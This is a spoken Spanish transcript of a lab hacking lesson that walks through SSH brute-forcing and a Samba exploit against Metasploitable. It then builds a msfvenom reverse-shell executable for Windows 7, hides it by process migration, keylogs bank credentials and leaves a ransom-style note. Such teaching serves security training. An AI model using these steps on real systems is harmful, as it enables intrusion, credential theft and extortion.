Ya muchachos, observen, primero, vamos a partir con el video de las explotaciones. Para eso voy a empezar utilizando Kali. En estos momentos Kali se encuentra conectada a una red, sin embargo, vamos a suponer que yo no sé qué es lo que hay en esa red, ¿cierto? Entonces, una de las formas en las que puedo averiguar qué es lo que hay dentro de la red es tomar Nmap, ¿sí? Y utilizar un escaneo sobre toda la red para poder ver cuáles son los dispositivos que hay conectados, ¿sí? Sin embargo, consume demasiados recursos, ¿cierto? Hay formas más fáciles en las que lo puedo verificar. Una de ellas es a través de un escáner ARP, ¿sí? Entonces, fíjese usted, voy a hacer un escáner ARP a través de la interfaz de Kali, que es ETH0. La interfaz de Kali se llama así. De hecho, si usted quiere saber cómo se llama la interfaz, ¿cierto? La puede ver acá, en las opciones de conexión, ¿cierto? Donde usted hizo la conexión para IPv4, ¿ya? Y le puedo decir que escanee la localnet, es decir, la red local. Entonces, lo que me va a arrojar esto de regreso, ¿cierto? Es que hay dos dispositivos conectados. Un dispositivo que termina en 210, un dispositivo que termina en 180, ¿ya? Son estas dos máquinas. Ahora, yo no sé qué son las máquinas que hay conectadas ahí, entonces le voy a hacer un ping a cada una de ellas para poder ver qué es lo que me devuelven. Voy a hacer un ping de una sola consulta hacia la 180. Fíjese que el time to live que me devuelve es de 64. Los time to live que están por debajo de 100 generalmente corresponden, ¿cierto?, a máquinas que están basadas en sistemas Linux, ¿ya? Y fíjese ahora lo que voy a hacer un ping de nuevo, pero hacia la otra máquina, hacia la 180.168.0.210, ¿sí? Y me devuelve un time to live de 128. Time to live que están por encima de 100. Generalmente, ¿cierto?, corresponden a sistemas que están basados en Windows. Por lo tanto, yo ya sé que esta IP corresponde a un sistema muy probablemente de Windows. Esto corresponde muy probablemente a un sistema de Linux. Entonces, ahora sí, ¿cierto?, vamos a hacer un escaneo muy sencillo, ¿correcto? Fíjese usted, para que veamos la relación con lo anterior, ¿cierto? Yo le voy a hacer un segundo. Ahí está, esto creo que era, este es Metasploitable, ¿cierto? Este es Linux. Entonces, fíjese, yo le voy a hacer un escaneo muy rápido, ¿cierto?, a la máquina Linux para los primeros 100 puertos. Para P del 1 al 100. ¿Ya? Entonces, si usted se fija, ¿cierto?, ahora cuando me arroje el resultado, ¿cierto?, yo voy a ver la información que hay dentro de estos puertos y voy a poder buscar una vulnerabilidad para poder explotarla, ¿cierto? Entonces, ya que parece que se va a demorar un poco, le vamos a poner un pausa. Ya, fíjese entonces, aquí tengo el resultado, ¿cierto? Y una de las cosas que puedo ver, ¿cierto?, es que esta máquina tiene un servicio de SSH que está vulnerable, ¿cierto? Entonces, veo aquí, ¿cierto?, que me dice, oye, hay un abierto, ¿cierto?, en SSH, ¿cierto? Está el protocolo 2.0, Debian, ¿cierto? Entonces vamos a atacar eso, como a través de un ataque de fuerza bruta, ¿ya? Primero, voy a crear diccionarios, ¿sí? Aquí, file. Voy a crear un diccionario que se va a llamar users.txt y voy a crear un segundo diccionario que se va a llamar pass.txt. Entonces, fíjese, voy a entrar a users, ¿cierto? Para poder empezar a escribir, aprieto la letra A, ¿ya?, o alguna otra tecla de letras, ¿cierto? Y voy a empezar aquí a escribir posibles nombres de usuario. Por ejemplo, admin, administrador, el tercero que voy a escribir va a ser mfcadmin, nosotros sabemos que es ese, ¿cierto? Voy a escribir root, correcto, y con eso me basta. Lo voy a guardar, lo voy a cerrar. Entonces ahora dentro de users hay un listado de posibles usuarios. Voy a hacer lo mismo con los passwords. Los voy a abrir, ¿cierto? Y voy a escribir posibles passwords, empezando por 1, 2, 3, 4, 5, 6, mfcadmin, ¿cierto? Password, contraseña, ¿cierto? Y con eso nos basta por ahora. Evidentemente estos diccionarios, ¿cierto?, son diccionarios mucho más extensos cuando nosotros los descargamos desde una fuente, ¿cierto? Estos son diccionarios pequeños simplemente para poder copiar, ¿correcto?, para poder intentar realizar un ataque de fuerza bruta.
todas las explotaciones que nosotros vamos a realizar, las vamos a realizar en base a Metasploit. Metasploit es una herramienta, ¿cierto?, que está integrada dentro de Kali Linux. Ahí está. Usted puede buscar en la barra de búsqueda, ¿cierto?, Metasploit, y puede hacerle clic para poder iniciarla. La ventaja de iniciar Metasploit, ¿cierto?, a través de la barra de búsqueda, iniciarlo de esta forma, es que si usted se fija arriba, a mí me ejecuta dos comandos de una sola vez. mfcdb-init, ¿cierto?, y msf-console, ¿cierto?, es decir, inicia la base de datos, con una correspondiente actualización si es que corresponde, ¿cierto?, y luego me inicia la consola. Ahora, esto me podría servir para actualizaciones. Como nosotros aquí no tenemos ninguna actualización que correr porque esta página no está conectada a internet, ¿cierto?, en realidad da exactamente lo mismo y podríamos iniciarla de manera normal, ¿cierto?, simplemente con msf-console, que lo que hace es iniciar Metasploit, ¿ya? Cualquiera de las dos formas que usted quiera realizar, ¿cierto?, va a cumplir la función de iniciar Metasploit, ¿correcto? Nos va a mostrar un pequeño banner. Ojo, hay algunos banners que representan mensajes de error. No significa que el framework le esté arrojando un error. Son los banners de presentación, ¿ya? Yo sé que Metasploit está activado porque aquí puedo ver el prompt, ¿cierto? Empezar a trabajar, me dice MSF5. Eso significa que estamos trabajando con Metasploit 5, ¿cierto? Y una de las herramientas más potentes que yo tengo para poder buscar, ¿cierto?, es el elemento de Search. Search a mí me va a permitir poder buscar, ¿cierto?, entre los diversos elementos que tiene Metasploit disponibles, ¿correcto? Y esos elementos son los siguientes: exploits, ¿cierto?, que a mí me permiten poder explotar vulnerabilidades, elementos auxiliares, que son generalmente escáneres para poder detectar vulnerabilidades, post, que son elementos de post-explotación para poder encontrar información relevante, ¿cierto?, para elaborar informes, sobre todo, extraer información de las víctimas, payloads, que son cargas maliciosas que yo puedo utilizar, encoders, ¿correcto?, que son encriptadores, ¿cierto?, para poder encriptar ya sea tráfico, archivos, lo que sea, ¿cierto? Sistemas de evasión, ¿cierto?, y los NOPs, que en estos momentos no me acuerdo qué son, pero lo puede googlear, ¿cierto? Ahora, si usted quiere buscar entre medio de estos elementos, ¿cierto?, hay varias formas en las que puede buscar, pero toda búsqueda, ¿cierto?, se utiliza o inicia a partir del comando search, ¿ya? Search es el comando que a usted le va a permitir buscar exploits, encoders, scanners o lo que sea que quiera utilizar, y va a tener que buscar a partir de un parámetro de búsqueda. Ese parámetro de búsqueda puede ser una vulnerabilidad, ¿cierto?, por ejemplo, CVE 211 8097, ¿cierto?, que podría ser, por ejemplo, una vulnerabilidad. Puede buscar a partir de un protocolo, ¿cierto?, por ejemplo, HTTP, SSH, ¿cierto?, puede buscar a través de Telnet, ¿ya? O puede buscar, ¿cierto?, a partir de un tipo de tráfico específico, ¿cierto?, aunque esto sería más amplio, ¿cierto?, que podría buscar a través, por ejemplo, de TCP o algo similar. Luego, también puede buscar por nombre de exploit, ¿cierto?, si es que lo conoce, ¿ya? Por ejemplo, yo quiero utilizar el exploit de SSH login, ¿cierto?, que es el exploit que a mí me va a permitir realizar el ataque de fuerza bruta, que es este, ¿cierto? Entonces, si usted se fija, ¿cierto?, yo puedo llegar ahí buscando a través de el servicio de SSH, ¿cierto? O puedo llegar buscando directamente, ¿cierto?, un segundo, a través de... Voy a bajarle un poquito, ¿cierto?, al zoom, ¿cierto?, para que me lo muestre ordenado. Ya. O puedo llegar buscando, ¿cierto?, a través del nombre del servicio, ¿cierto?, a través del protocolo, lo que sea, ¿cierto? Y los resultados siempre se me van a mostrar de la siguiente manera. Fíjese, una lista numerada del 0 en adelante, ¿cierto?, números correlativos. Luego, el nombre del elemento, una fecha de publicación, si es que tiene alguna, un rango que me dice qué tan efectivo es, ¿cierto?, si funciona bien, funciona mal, ¿correcto? Está normal, average, que son los promedios, ¿cierto? Funciona excelente, ¿cierto?, o funciona bastante bien, ¿cierto? Estas clasificaciones, generalmente los que funcionan mejor tienen un color verde similar a este. Luego, este check es de si está comprobada su efectividad, ¿cierto?
Y esta descripción, ¿cierto? Es una descripción pequeña de qué es lo que hace, ¿cierto? Entonces esto, si usted se fija, es un login, un escáner para el check del login de SSH. Es decir, lo que hace un ataque de fuerza bruta. Recorre el servicio de SSH utilizando combinaciones entre usuarios y contraseñas, ¿cierto? Para poder darme a mí una combinación que funcione. Entonces, para poder usarlo, yo tengo dos posibilidades para poder cargarlo. Pongo use, ¿cierto? Que es el comando para cargar. Y forma 1 de cargarlo, ¿cierto? Escribo auxiliary, ¿cierto? Scanner SSH login, ¿cierto? Y ahí yo habría llegado, ¿cierto? Al elemento, ¿cierto? Y ahí lo podría cargar. Pero la otra opción también es, aprovechando que tengo aquí arriba la lista numerada, ¿cierto? Usar los números. Entonces, si usted se fija, este tiene el número 0. Yo le pongo usa el 0 y me trae el elemento de la última lista numerada que yo traje, ¿cierto? En este caso me trae SSH login. Sé que está cargado porque me aparece aquí el nombre resaltado. Ya, cuando yo voy a utilizar una herramienta de Metasploit, hay 3 pasos que tengo que seguir. Siempre son los mismos. El paso número 1 es este, cargar la herramienta, ¿ya? El paso número 2 es configurar los parámetros. Y el paso número 3 es ejecutar. Entonces, acabo de completar el paso número 1, que es cargar la herramienta, ¿cierto? Ahora voy al paso número 2, que es configurar los parámetros. Los parámetros yo los puedo ver utilizando el comando showOptions, que me va a mostrar, ¿cierto? Aquí el listado de parámetros. Fíjese usted, cada uno de estos es un parámetro, ¿sí? Cada línea es un parámetro. Este que está aquí también es... No, ¿dónde estás? No, no, aquí no tengo a la vista el payload, ¿cierto? No, el payload lo vamos a ver después. Si es que tuviese yo aquí el payload, ¿cierto? Tendría el payload también como un parámetro. Aquí tengo cada uno de los parámetros, fíjese. Cada parámetro tiene un nombre, un valor asignado, ¿cierto? Si no tiene ningún valor asignado, entonces está vacío, ¿cierto? Un indicador de si es obligatorio o no y una descripción. Entonces, puedo ver el nombre del parámetro, si es que tiene algo configurado, si es obligatorio o no, si dice yes, es obligatorio, si dice no, es opcional, y una pequeña descripción de qué es lo que hace el parámetro. Antes de yo pasar a la siguiente etapa, que es la etapa de ejecución, como mínimo, todos los parámetros obligatorios tienen que tener un valor correspondiente. Fíjese usted, este parámetro obligatorio tiene asignado un valor, 5, ¿cierto? Este parámetro obligatorio también tiene asignado un valor, 22. Este también tiene asignado un valor, falso. Este también tiene asignado un valor, falso. Este parámetro no tiene asignado ningún valor y es obligatorio. Entonces yo tengo que poder asignarle un valor. Para poder asignarle un valor al parámetro, primero tengo que ver qué es lo que hace el parámetro. Este parámetro, que se llama rhost, dice, es, ¿cierto?, el host objetivo, ¿ya? Un identificador CIDR. Eso significa dirección IP, ¿ya? Por tanto, ¿cuál era la dirección IP de Metasploitable? A 192.168.0.180. Ya. Entonces, aquí vamos a poner el objetivo, ¿cierto? ¿Cómo pongo el parámetro? Set, ¿cierto? Que es para poder ver, para poder establecer cualquier parámetro, seguido del nombre del parámetro que quiero establecer. rhost. Tiene que ser el mismo nombre. Fíjese, termina en S, por lo tanto una S al final, ¿ya? Y ahora el valor que le quiero asignar al parámetro. En este caso la dirección IP, 192.168.0.180. Listo, me dice, le asigné ese valor, yo puedo volver a llamar un showOptions, ¿cierto? Y con eso voy a volver a ver la lista actualizada ahora, y usted puede fijarse que ahora tiene el parámetro de rhost un valor asignado. Listo, tengo, ¿cierto?, todos los parámetros obligatorios asignados. Ahora tengo que revisar si es que hay algún parámetro opcional, ¿cierto?, que yo necesite configurar. En este caso, los parámetros opcionales que yo puedo configurar son password, password file, username, user file y user pass file. ¿Sí? Username y password son en el caso de que yo me sepa el usuario y el password. Evidentemente no me sé el usuario y el password. Si me lo supiera no estaría haciendo el ataque de fuerza bruta, ¿ya? Entonces, passfile, correcto, es el diccionario o el archivo que contiene los passwords, uno por línea, que es el que armamos al inicio. User file es el que contiene los nombres
posibles de los usuarios, el diccionario que armamos al inicio, uno por fila, y user pass file es un diccionario que contiene las dos cosas, ¿cierto? Los nombres de usuarios, ¿cierto? Y una segunda columna que es por los passwords, ¿sí? Separados por una línea. Nosotros vamos a usar los diccionarios por separado, ¿cierto? Para poder establecerlos. Voy a ir a buscar los diccionarios que creamos, ¿cierto? Y se los voy a asignar a pass file y a user file según corresponde. Entonces, primero, pass file, que está en root, desktop, ¿cierto? Y pass.txt. Y ahora el user file, que está en root, desktop, users. Listo. Ahora tengo configurado correctamente, ¿cierto?, el exploit y estoy en condiciones de poder iniciar el ataque. Para poder iniciar el ataque puedo hacerlo de dos formas. Escribo exploit o escribo run y luego le doy enter. Aquí empieza a cargar. En particular, este exploit o este ataque, en conjunto con algunos otros, se puede demorar bastante, ¿ya? Tiene que probar sobre el protocolo de SSH, sobre el servicio de SSH, las combinaciones posibles de cada uno de los usuarios y cada uno de los passwords, y eso toma tiempo, ¿ya? Tiene que ser paciente. Muchos procesos, ¿correcto?, de trabajo, al igual que teníamos, ¿cierto?, con el escáner del map, puede que tomen tiempo. Vamos a ponerle pausa, ¿cierto? Listo, si usted se fija, aquí terminó el escáner, ¿correcto? Entonces me está arrojando un resultado que es este de acá, me dice éxito, ¿cierto? Me dice msfadmin, msfadmin. Eso significa que el escáner tuvo éxito, ¿correcto? Y encontró las credenciales, ¿correcto? Y esas credenciales son válidas, ¿ya? Si yo, por ejemplo, podría ahora salir de acá, ¿cierto? Ahora que tengo las credenciales, ¿cierto? Y girar una conexión de SSH con msfadmin, ¿cierto?, hacia la máquina objetivo, ¿cierto?, que es 192.168.0.180, ¿cierto? Me va a preguntar si me quiero conectar, ¿cierto? Vamos a esperar ahí que inicie. Si usted se fija, ¿cierto?, aquí me va a pedir el password, que era el mismo. Yo habilito, ¿cierto? Y aquí tengo, ¿cierto?, ya hecha la conexión hacia Metasploitable, ¿cierto? De hecho, yo puedo preguntarle... Ah, sí, la cerré. Un segundo. Aquí. No sé qué pasó ahí. Ya, fíjese usted, ¿cierto? Yo aquí tengo... podría preguntarle, ¿cierto?, quién soy, y me va a decir que estoy en Metasploitable, ¿cierto? Entonces, esto, correcto, a mí me sirve para poder ir... un segundo, tengo la consola dividida. Vamos a cerrar la consola. Esto me sirve, ¿cierto?, para poder ir trayendo información, ¿cierto?, y poder establecer conexiones, sesiones como, por ejemplo, estas. Ya, ahora que tenemos hecho el exploit, ¿cierto?, sobre SSH, movámonos a otro servicio, ¿cierto? Vamos a hacer de nuevo un escáner, ¿cierto? Más 192. Sin embargo, lo vamos a hacer sobre los puertos del 130 al 140, ¿sí? Ya, démosle un par de segundos a que termine, ¿cierto? Y con eso vamos a ver cuáles son los servicios que se están publicando, ¿ya? Entonces, tal cual como usted puede ver, uno tiene que saber dónde buscar. En este caso, yo voy a buscar en un rango de puertos, ¿cierto? Yo sé que en este rango de puertos están los puertos por defecto de Samba, ¿sí? Entonces, lo que quiero ver es si el servicio de Samba se está ejecutando dentro de la máquina, ¿ya? ¿Por qué? Porque el servicio de Samba es vulnerable, ¿ya? Y una vez que, si es que lo encuentro, ¿cierto?, voy a poder establecer una conexión, ¿cierto?, para poder verlo. Entonces, fíjese usted, ¿cierto? Me dice aquí, ¿cierto?, que los puertos están cerrados, ¿cierto? Pero fíjese usted aquí que yo tengo un puerto que es el 139, ¿cierto? Ahí está el servicio de Samba, ¿ya? Entonces, eso significa que muy probablemente este equipo es vulnerable a Samba, ¿ya? Entonces, fíjese bien lo que vamos a hacer, ¿cierto? Yo voy a ir de nuevo a MSF Console.
Vamos a esperar que se inicie, ¿cierto? Y ahora voy a hacer un search de Samba, ¿sí? Entonces, un segundo para que se vea más ordenado. Search Samba. Entonces, fíjese usted, ¿cierto? Aquí tengo varios resultados, ¿ya? Y hay uno aquí que vamos a utilizar, que es este, ¿cierto? Que es el User Map Script, que lo vamos a utilizar para poder realizar la explotación hacia el servicio de Samba, ¿ya? Command Execution, ¿cierto? Eso es lo que necesitamos. Entonces, para poder cargarlo, ¿cierto? Vamos a usar un use y el número, ¿ya? Ahí tengo cargado, ¿cierto? El script. Entonces, recuerde usted, paso número 1, cargar. Paso número 2, revisar los parámetros para hacer la configuración. Show options, ¿cierto? Y aquí tengo los parámetros. Fíjese usted, yo no necesito modificar el puerto, ¿cierto? En el objetivo, porque el puerto que nosotros vimos que estaba publicando Samba, ¿cierto? Era el 139. Ahora, si yo hubiese visto que Samba se estaba publicando en otro puerto, por ejemplo, 137, 136, ¿cierto? Entonces ahí habíamos tenido que ajustar este valor, ¿cierto? Pero como el puerto que vimos era el que se estaba publicando, ¿cierto? Entonces no necesitamos modificarlo. Luego me falta añadir el rhost, ¿cierto? Entonces, set rhost y la dirección IP de la máquina de Metasploitable. ¿Qué más? Esto ya tiene valor, ¿cierto? Generalmente los parámetros que tienen un valor no hay que modificarlos. Aquí tenemos esto que es otro parámetro adicional, ¿cierto? Que es el payload. El payload generalmente no hay que modificarlo, salvo que usted necesite por X motivo modificarlo, ¿cierto? Ahora ya, ¿cierto? De nuevo, estamos listos, ¿correcto? Los parámetros están todos completamente configurados. Entonces, otra vez nos podemos ir al paso número 3, que es ejecutar, ¿cierto? A través de exploit o run. Ahora lo vamos a hacer con exploit. Ya, fíjese usted, el resultado me dice que se inició una conexión TCP, ¿cierto? Y que tengo una sesión de shell abierta. Esa sesión está aquí, la tengo abierta en la consola. Fíjese, si yo hago un hostname, ¿cierto? Me dice que estoy en Metasploitable. Si hago un uname, me dice que estoy en un sistema Linux. Si pregunto who am I, me va a decir que estoy logueado con la cuenta del root, ¿cierto? Y aquí ya puedo empezar a hacer cosas, ¿cierto? Extraer información, ¿cierto? Como por ejemplo, hacer un cat, etc, passwd y sacar las cuentas de los usuarios, ¿cierto? O puedo empezar a manipular el sistema, ¿cierto? Yo, por ejemplo, podría hacer un cat, etc, fztab, ¿cierto? Y aquí están los discos allá abajo, ¿cierto? Si usted se fija. Entonces yo, por ejemplo, podría agregar un montaje nuevo, ¿cierto? Supongamos que esto es un montaje nuevo, ¿cierto? Y lo tiro al final de etc fztab, ¿ya? Entonces si yo ahora hago un cat etc fztab, ¿cierto? Yo podría aquí haber tirado un disco nuevo, ¿cierto? Y haber hecho la configuración dentro de Linux, ¿cierto? Para haber creado una partición o haber creado un elemento, ¿ya? Luego, fíjese, también puedo hacer manipulación de archivos, ¿cierto? Por ejemplo, yo puedo hacer un pwd para saber dónde estoy, ¿cierto? Estoy en la raíz, entonces me voy a ir a cd home, a la carpeta del msf admin, ¿cierto? Y aquí adentro le voy a crear un directorio que se va a llamar Pawnet. Y voy a entrar a Pawnet, ¿ya? Entonces ahora estoy dentro de Pawnet, fíjese usted. Y aquí dentro le voy a crear un archivo, ¿cierto? Ha sido hackeado. Y esto lo voy a tirar hacia hackeado.txt. Entonces la persona, ¿cierto? Que esté en el Metasploitable, ¿cierto? Cuando venga acá, ¿ya? Va a ver que tiene una carpeta nueva, esa, ¿cierto? Pawnet. Va a ir a ver qué es lo que tiene dentro, ¿cierto? Y dentro de Pawnet lo que tiene es un archivo que dice hackeado. Se va a ir a mirar qué es lo que dice hackeado y dice has sido hackeado, ¿ya? Tengo una sesión remota controlando el dispositivo. Esto evidentemente no me interesa que sepa que lo hackearon, ¿cierto? Una demostración para que veamos algunas cosas que se pueden hacer. Ya, ahora, ¿cierto? Vamos a movernos a construcción de malware, ¿cierto? Para eso vamos a infectar Windows 7, ¿ya? Y, dame un segundito.
Ya, entonces, ¿qué me queda? Vamos a construir malware, ¿cierto? Para eso vamos a infectar Windows 7, ¿sí? Que tenemos acá, ¿ya? Y bueno, lo primero que yo tengo que hacer para poder infectar un equipo, ¿cierto? Es arrancar el multihandler. SF console. Entonces, fíjese usted, ¿cierto? Yo ahora voy a venir acá y voy a hacer un use multi-handler. Entonces, aquí estoy utilizando, ¿cierto? El multi-handler, ¿ya? Y el multi-handler es para poder levantar un servidor, ¿cierto? Que va a quedar a la espera de una conexión, ¿sí? Va a convertir esta máquina, ¿cierto? En un servidor que va a recibir una conexión y cuando reciba esa conexión va a abrir una sesión automáticamente, ¿ya? Entonces, para poder configurar el multi-handler, yo tengo que poder, igual que con todos los elementos, ¿cierto? de Metasploit, configurar las opciones. Entonces, el puerto lo vamos a dejar como está. Fíjese que tengo que configurar algo que se llama lhost y dice la dirección a la escucha. Ese soy yo, ¿cierto? Yo voy a estar a la escucha. Por lo tanto, set lhost y mi propia dirección, 192.168.0.100, ¿ya? Entonces, fíjese usted que ahora tengo acá, ¿cierto? Configurado el lhost y ahora me falta configurar el payload, ¿sí? Este payload que está aquí, este generic, no me sirve mucho, ¿cierto? Tengo que escoger un payload que sea más específico. Para eso, show payloads, ¿ya? Y eso va a permitir que usted pueda ver el listado de payloads disponibles, ¿ya? Entonces, ahí. Fíjese, ¿cierto? Aquí está el listado de payloads disponibles, ¿sí? Y hay varias formas en las que usted puede identificar un payload, ¿ya? Por ejemplo, los payloads que empiezan con Android son payloads para Android, ¿cierto? Los payloads que empiezan por Apple son para dispositivos de Apple. Los payloads que empiezan con BSD o BSDI, ¿cierto? O con CMD también tienen una función específica. Va a encontrar para Java, Linux, ¿cierto? Va a encontrar payloads para PHP, Python, Solaris, ¿cierto? Ahí hay para Windows, ¿cierto? Y luego cuando encuentro para el sistema, ¿cierto? O para el tipo de código específico, ¿cierto? Que usted necesita, va a poder empezar a ver las opciones que hay a continuación, ¿cierto? Entonces, por ejemplo, si usted se fija, los que dicen shell tienen por objetivo abrir una shell, ¿ya? Los que dicen, por ejemplo, Meterpreter, ¿cierto? Tienen por objetivo abrir una sesión de Meterpreter. Y luego está el método, ¿cierto? Entonces, por ejemplo, ¿cierto? Si yo voy a decir, chuta, quiero uno de Windows, ¿cierto? Porque vamos a explotar Windows, ¿ya? Y quiero abrir una sesión de Meterpreter, ¿ya? Aquí están todas las formas en las que puedo abrir sesiones de Meterpreter, ¿cierto? Por ejemplo, a través de HTTPS, a través de HTTP, ¿cierto? Entonces, lo que yo voy a utilizar es esto. Windows Meterpreter Reverse TCP, ¿ya? Esto requiere conocimiento técnico, chicos, ¿ya? Solamente eso, conocimiento técnico. Entonces, fíjese usted, este payload es el número 350, ¿ya? Entonces, yo para poder utilizarlo, ¿cierto? Voy a hacer un set payload 350, ¿cierto? Y me va a traer el payload desde la lista. Y me va a decir que está establecido ahora Windows Meterpreter Reverse TCP. Show Options de nuevo para que veamos las opciones configuradas, ¿cierto? Y aquí usted puede ver que tengo establecido el payload, que tengo establecido el host, ¿cierto? Y que estamos listos para poder empezar, ¿cierto? A correr el servidor. Entonces yo hago un run. El servidor está activo. No va a hacer nada porque todavía no ha recibido la conexión. Primero tengo que crear un malware, ¿ya? Entonces eso lo vamos a hacer primero acá creando una carpeta, la que le vamos a poner Toxic, ¿cierto? Voy a abrir una consola y voy a navegar a esa carpeta. ¿Sí? cd, root, desktop, toxic, toxic. ¿Sí? Entonces ahora que estoy dentro de esta carpeta, lo que voy a hacer dentro de esta carpeta, que fíjese, dentro de la carpeta no hay nada, ¿ya? Es que voy a crear un malware. ¿Cómo?
con el comando msfvenom. A msfvenom tengo que seguirle un "-p" que me permite cargar el payload. El payload que yo voy a cargar dentro de este malware tiene que ser el mismo que estoy utilizando dentro del servidor. Si no utilizo el mismo, no va a funcionar, ¿ya? Entonces, pego el payload, ¿cierto? Y ahora tengo que configurarle el lhost, que soy yo, ¿cierto? Mi propia dirección IP, el lport, ¿cierto? Que también soy yo, y que también tienen que coincidir con lo que está puesto, ¿cierto? En las opciones del servidor. Luego F para decir que esto va a ser un .exe, ¿cierto? Y le doy nombre. Le vamos a poner de nombre malware.exe, aunque podríamos ponerle cualquier cosa. Por ejemplo, yo le voy a poner frutilla.exe, ¿sí? Y si usted se fija, esto va a iniciar un proceso, ¿ya? Que una vez que termine, me va a dejar creado un archivo que se llama frutilla.exe, ¿cierto? Que está aquí dentro. Este es el malware, ¿ya? Dentro tiene un payload, ¿sí? Un código para hacer conexión. Entonces, yo ahora, ¿cierto? Lo voy a publicar. Python 3, m, http server, ¿cierto? Lo levantamos a través del puerto 80, podría ser cualquier otro, yo lo voy a levantar a través del puerto 80 porque es el puerto por defecto, ¿cierto? Y cuando me vaya a Windows 7, ¿cierto? Si yo abro navegador, que podría ser Chrome o podría ser Internet Explorer o cualquier otro, ¿cierto? Yo voy a ir a 192.168.0.100, 2.80, ¿cierto? Y ¿no me conecta? ¿No? Probemos con Chrome. 192.168.0.100, ¿sí? Ahí está, ¿cierto? Entonces aquí tengo el servidor, ¿cierto? Fíjese. Ahora, evidentemente, ¿cierto? Cuando alguien levante esto, ¿cierto? No va a levantar un servidor o un directorio como esto, sino que va a tener una web, un endpoint, que va a descargar automáticamente este archivo al computador, ¿cierto? Y ese archivo no va a estar configurado para que tenga que ser ejecutado, sino que va a ser un ejecutable, ¿cierto? Es decir, se descarga y se ejecuta inmediatamente, se instala como servicio. Entonces, fíjese usted, yo voy a descargar esto. Chrome evidentemente me va a intentar avisar que estoy descargando algo que no corresponde, algo peligroso, me va a aparecer aquí el mensaje, ¿cierto? Este equipo puede dañar tu ordenador, ¿cierto? ¿Por qué? Porque no está ofuscado. Se llama frutilla.exe, ¿cierto? Esto yo podría disfrazarlo como un paquete de actualizaciones, ¿cierto? Es decir, yo podría venir acá, ¿cierto? Fíjese usted, yo podría venir, por ejemplo, a archivos de programa, Microsoft, ¿ya? Yo podría ponerle ese icono, ese nombre, esa extensión, ¿cierto? A través de un ofuscador, ¿cierto? Y entonces sería mucho más difícil detectarlo, ¿ya? Pero como se llama frutilla.exe, ¿cierto? Y tiene un icono normal, ¿cierto? Lo más probable es que el computador detecte que es algo malicioso, lo voy a ejecutar, ¿cierto? Fíjese que ahora esto está corriendo, y ahora que está corriendo yo aquí no veo nada, ¿cierto? Fíjese usted, ¿cierto? No, parece que no ha cambiado nada. Sin embargo, si yo me vengo acá, al servidor donde está corriendo, ¿cierto? En Metasploitable, el servicio de multihandler, fíjese que tengo una sesión abierta a través de Meterpreter, ¿ya? Fíjese, sesión abierta. Tengo una sesión abierta en Meterpreter, ¿ya? Ahora, Meterpreter puede hacer muchas cosas dentro de la víctima. Y una de las primeras cosas que deberíamos hacer es ocultar esta conexión. Fíjese, voy a venir acá, si yo me vengo al Task Manager, ¿sí? Yo puedo ver que aquí está frutilla.exe, ¿cierto? ¿Cierto? Que me dice que es una utilidad de línea de comando. Entonces yo puedo ver que esto, ¿cierto? Es una conexión. Entonces podría terminarlo, ¿cierto? A través de net process, ¿ya? Y en ese caso, ¿cierto? Me estaría enfrentando aquí, ¿cierto? A una conexión terminada. Pero no me interesa, ¿cierto? Que el usuario me pueda terminar la conexión, lo que yo quiero es ocultarla. ¿Cierto? Entonces eso lo voy a hacer a través de un proceso de migración y para eso primero tengo que conocer el PID de ese proceso, que es uno de los que generalmente se utilizan para poder esconderlo, ¿ya?
Entonces fíjese que voy a hacer un pss hacia explorer.exe y con eso le voy a sacar el PID a este proceso, ¿ya? Y ahora lo que voy a hacer es migrar frutilla.exe hacia explorer.exe a través de un migrate 1244, que es el PID, ¿cierto? Entonces fíjese usted, frutilla desapareció, ya no está, ¿cierto? Porque está migrado, está escondido debajo de este proceso, ¿cierto? Eso significa que ya no es detectable. Y aquí yo me puedo quedar escondido un montón de tiempo, ¿cierto? Sacando información o buscando cosas dentro de la máquina, ¿ya? ¿Qué cosas puedo hacer? Bueno, Meterpreter me permite hacer un montón de cosas, ¿cierto? Usted hace un help, ¿cierto? Fíjese, me permite poder, por ejemplo, acceder a cámaras, ¿cierto? Y micrófonos para poder grabar registros, sacar capturas de pantalla, ¿cierto? Sacar eventos, ¿cierto? De teclado, ¿cierto? Que de hecho eso lo podemos hacer aquí fácilmente, ¿cierto? Yo dentro de Meterpreter puedo hacer un keyscan start, ¿cierto? Y si usted se fija, yo aquí lo dejo trabajando. Entonces, en algún momento, ¿cierto? Esta persona va a venir, va a abrir un navegador, ¿cierto? Y va a entrar, por ejemplo, no sé, a gmail.com. Y dentro de gmail.com, ¿cierto? Va a ingresar, ¿cierto? Aquí no tenemos internet, por lo tanto no lo puedo ver, ¿cierto? Pero va a ingresar sus datos, como son, por ejemplo, pepitos.com, ¿cierto? Y luego va a poner su credencial, ¿cierto? Que va a ser 1, 2, 3, 4, 5, 6. Y fíjese usted aquí, yo le voy a poner keyscan-dump. Y esto me va a arrojar, ¿cierto? Las credenciales, ¿cierto? Fíjese, Gmail, ¿cierto? Aquí está Note porque abrí Notepad, ¿ya? Pepito, ¿cierto? Que aquí yo puedo ir sacando y aquí ya tengo la información, ¿cierto? Ahí hay una arroba. Ahora, evidentemente aquí dice Pepito porque fíjese usted que yo me equivoqué, ¿cierto? Pero, por ejemplo, si yo ingresara a cualquier cosa, ¿cierto? Eso va a quedar registrado. Por ejemplo, si la persona entrara a Banco Santander, bancosantander.cl y luego ingresara a su root, ¿cierto? 15.452.214-5 y luego su clave numérica, que sería por ejemplo 112233, ¿cierto? Entonces aquí yo lo puedo sacar, ¿cierto? Fíjate, ahí tengo, entró a Banco Santander, ¿cierto? Ahí está su root, ahí está su clave numérica, a través del sniffer, ¿ya? Estoy haciendo un keylogger. Ya, y otras cosas que puedo hacer también aquí es obviamente manipular el sistema operativo, aunque eso generalmente no lo hacemos, ¿cierto? Desde Meterpreter, sino que para eso necesitamos abrir una shell. Y por eso yo pongo un shell. Y fíjese, ¿cierto? Que ahora tengo abierto, correcto, el sistema, ¿ya? Entonces, ¿qué es lo que voy a hacer yo? Voy a venir hacia abajo, ¿sí? Users. Este usuario se llama IE-User, ¿cierto? Entonces, cd IE-User, cd desktop. Ya, ahí estoy en el escritorio, ¿cierto? Entonces, fíjese en la reacción que va a tener Windows, ¿sí? Yo le voy a hacer un mkdir pownet. Voy a ir dentro de la carpeta, ¿no? cd pownet, y voy a hacer un echo. Has sido hackeado y tengo tu info. Deposítame dinero. Y esto lo voy a crear dentro de hackeado.txt. ¿Sí? Entonces, si usted se fija, ¿cierto? Ahí está el mensaje, ¿cierto? Aquí yo puedo hacer un montón de cosas dentro de el sistema, ¿cierto? Incluyendo sacar información. Fíjese que yo puedo venir acá, 